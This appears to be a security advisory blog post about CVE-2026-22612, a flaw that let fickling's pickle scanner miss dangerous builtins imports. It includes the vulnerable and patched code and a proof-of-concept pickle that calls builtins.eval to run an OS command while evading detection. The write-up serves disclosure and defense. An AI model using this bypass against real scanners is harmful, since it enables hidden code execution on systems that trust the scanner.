Feb 23, 2026·6 min read·2 visits
Fickling < 0.1.7 fails to detect malicious pickle payloads that use the `builtins` namespace. To keep decompiled code 'clean', the tool skipped generating AST nodes for builtin imports. This allows attackers to bypass static analysis and achieve RCE by explicitly importing dangerous functions like `builtins.eval`.
Python's `pickle` module is notoriously dangerous—essentially a Remote Code Execution (RCE) engine masquerading as a serialization format. Tools like `fickling` were built to tame this beast by decompiling the pickle bytecode into a Python Abstract Syntax Tree (AST) and scanning it for malicious patterns. However, in a classic case of 'developer convenience over security,' `fickling` contained a logic flaw designed to make the decompiled output look cleaner. By intentionally suppressing AST nodes for `builtins`, the tool created a massive blind spot. Attackers could simply invoke `builtins.eval` or `builtins.exec` directly, and the security scanner—relying on those suppressed nodes—would happily wave the malicious payload through as safe.
If you've spent any time in the Python security trenches, you know the rule: Never unpickle untrusted data. It is not a suggestion; it is a commandment. Python's pickle serialization format is a stack-based virtual machine that allows the reconstruction of arbitrary objects. In the wrong hands, a pickle file isn't data; it's a script that executes inside your application's context.
Enter fickling. Developed by the sharp minds at Trail of Bits, fickling is a decompiler and static analyzer for pickle data. Its goal is noble: perform a 'pre-flight check' on untrusted pickles by converting the obscure stack opcodes into readable Python AST (Abstract Syntax Tree), and then statically analyzing that AST for dangerous calls like os.system or subprocess.Popen.
It’s a brilliant approach. Instead of trying to sandbox the execution, you analyze the intent. But CVE-2026-22612 reveals a fatal flaw in this translation layer. It turns out that in the pursuit of 'pretty' decompiled code, the tool decided to ignore the most dangerous namespace in the entire language: builtins.
The vulnerability resides in the engine that translates pickle opcodes into Python AST. When fickling encounters a GLOBAL opcode (which imports a module and an attribute), it generates an ast.ImportFrom node. This node is critical because the security scanner (analysis.py) scans the AST specifically looking for these import nodes to track where functions come from.
Here is where the logic went off the rails. The developers presumably thought, "Hey, if the pickle imports something from builtins (like str, int, or dict), we shouldn't clutter the decompiled output with from builtins import str. That's redundant in Python code."
So, they added a filter. If the module being imported was builtins, __builtin__, or __builtins__, fickling would skip generating the ast.ImportFrom node. It was a purely cosmetic decision—a "clean code" optimization.
Unfortunately, this optimization applied to everything in builtins, not just the safe stuff. It applied to builtins.eval, builtins.exec, builtins.compile, and builtins.getattr. By suppressing the import node, the AST effectively forgot where these functions came from. The security scanner would see a call to eval(...) in the code, but without the import trace linking it to the dangerous builtins module, it failed to flag it as malicious.
Let's look at the vulnerable code in fickling/fickle.py. This is the opcode handler for GLOBAL (opcode c) and STACK_GLOBAL (opcode \x94).
The Vulnerable Logic:
def run(self, interpreter: Interpreter):
module, attr = self.module, self.attr
# The fatal mistake: explicit blindness to builtins
if module in ("__builtin__", "__builtins__", "builtins"):
pass # <--- "Nothing to see here, move along."
else:
alias = ast.alias(attr)
interpreter.module_body.append(
ast.ImportFrom(module=module, names=[alias], level=0)
)
interpreter.stack.append(ast.Name(attr, ast.Load()))Because of that if block, an attacker importing builtins.eval results in... nothing in the module body. The interpreter stack gets the name eval, but the static analyzer has lost the context.
The Fix (Commit 9f309ab834797f280cb5143a2f6f987579fa7cdf):
The patch is delightfully simple: delete the special treatment. Treat builtins like any other module. If the malicious pickle imports it, the AST should reflect it.
def run(self, interpreter: Interpreter):
module, attr = self.module, self.attr
# No more hiding.
alias = ast.alias(attr)
interpreter.module_body.append(
ast.ImportFrom(module=module, names=[alias], level=0)
)
interpreter.stack.append(ast.Name(attr, ast.Load()))To exploit this, we don't need a complex memory corruption chain. We just need to speak the language of the Pickle Machine. We will construct a pickle stream that explicitly pulls eval from builtins.
Here is how we construct the payload using fickling's own opcode builders (ironic, isn't it?):
from fickling.pickle import Pickled, op
# The payload sequence
payload = [
# Opcode 'c': GLOBAL. Import 'eval' from 'builtins'.
# Vulnerable Fickling sees this and generates NO import node.
op.Global("builtins eval"),
# Push the arguments for eval onto the stack
op.String("__import__('os').system('id')"),
op.TupleOne(),
# Opcode 'R': REDUCE. Call the function (eval) with the tuple arguments.
# Fickling sees: eval("__import__('os').system('id')")
# But since it missed the import, it thinks 'eval' might be a safe local function.
op.Reduce(),
# Clean up stack to make it a valid pickle
op.Stop(),
]
pickled_data = Pickled(payload).dumps()When fickling < 0.1.7 scans this, it generates an AST that looks roughly like this:
_var0 = eval("__import__('os').system('id')")Wait, you might ask, "Shouldn't it catch eval anyway?" Not necessarily. The analyzer checks for Unsafe Imports. If the import is invisible, the check fails open. The logic assumes that if a function isn't explicitly imported from a blacklist, it's user-defined and safe.
The impact here is straightforward and severe: Detection Bypass. Organizations deploying fickling likely use it as a gatekeeper for Machine Learning models (which are often pickled) or other serialized data streams. They believe they have a safety net.
This vulnerability renders that net useless against a knowledgeable attacker. If you are relying on fickling to sanitize user uploads, you are currently vulnerable to Arbitrary Code Execution. The attacker can execute any Python code on your server with the privileges of the process running the unpickler.
This is particularly dangerous because it doesn't rely on a bug in Python itself; it exploits the security tool's assumption of what constitutes "relevant" code. It's a meta-exploit.
The remediation is simple: Upgrade to Fickling 0.1.7 immediately.
This version removes the logic that suppresses builtins imports. Now, when fickling encounters builtins.eval, it generates from builtins import eval in the AST. The security scanner, seeing this explicit import from a dangerous namespace, will immediately flag the file as unsafe.
Long-term Strategy:
While fickling is an excellent tool for analysis, it should not be the only line of defense. Pickling is inherently unsafe by design. If possible, move to safer serialization formats like JSON or Protocol Buffers. If you must use pickles (e.g., for PyTorch models), run the unpickling process in a tightly sandboxed environment with no network access and ephemeral filesystems.
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H| Product | Affected Versions | Fixed Version |
|---|---|---|
fickling Trail of Bits | < 0.1.7 | 0.1.7 |
| Attribute | Detail |
|---|---|
| Vulnerability Type | Security Feature Bypass |
| Attack Vector | Local / Network (Context Dependent) |
| CVSS v3.1 | 7.8 (High) |
| Impact | Remote Code Execution (RCE) |
| Exploit Status | PoC Available |
| Affected Component | Pickle-to-AST Translation Layer |
Improper Input Validation leads to security feature bypass.